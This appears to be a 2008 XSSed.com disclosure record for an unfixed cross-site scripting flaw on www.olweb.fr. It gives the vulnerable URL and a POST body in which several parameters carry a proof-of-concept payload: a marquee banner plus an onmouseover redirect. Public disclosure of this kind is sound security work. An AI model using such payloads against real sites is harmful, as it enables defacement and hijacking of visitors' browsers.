Security researcher karim b., has submitted on 16/04/2008 a cross-site-scripting (XSS) vulnerability affecting www.olweb.fr, which at the time of submission ranked 11611 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 17/04/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 16/04/2008 |
Date published: 17/04/2008 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: karim b. |
Domain: www.olweb.fr |
Category: XSS |
Pagerank: 11611 |
|---|
| URL: http://www.olweb.fr/index.php?lng=fr&pid=301004 |
| POST: returnUrl="><h1><marquee>xss</marquee></h1><img src="http://data.xssed.org/images/xssed_logo.gif"onmouseover="window.document.location='http://xssed .com'">&numCarteOl=&inscription=1&infocentreId="><h1><marquee>xss</marquee></h1><img src="http://data.xssed.org/images/xssed_logo.gif"onmouseover="window.document.location='http://xssed .com'">&msoId="><h1><marquee>xss</marquee></h1><img src="http://data.xssed.org/images/xssed_logo.gif"onmouseover="window.document.location='http://xssed .com'">&appGuid="><h1><marquee>xss</marquee></h1><img src="http://data.xssed.org/images/xssed_logo.gif"onmouseover="window.document.location='http://xssed .com'">&from="><h1><marquee>xss</marquee></h1><img src="http://data.xssed.org/images/xssed_logo.gif"onmouseover="window.document.location='http://xssed .com'">&formule="><h1><marquee>xss</marquee></h1><img src="http://data.xssed.org/images/xssed_logo.gif"onmouseover="window.document.location='http://xssed .com'">&pseudo=&mail=&mailBis=&password=&passwordBis=&civilite=1&nom=&prenom=&adresse1=&adresse2=&ad resse3=&pays=&cp=&ville=&numFixe=&numPort=&jourNaissance=JJ&moisNaissance=MM&anneeNaissance=AAAA&csp =&validerInscription.x=55&validerInscription.y=15&validerInscription=Valider |
|
Click here to view the mirror
|
|
|
| 
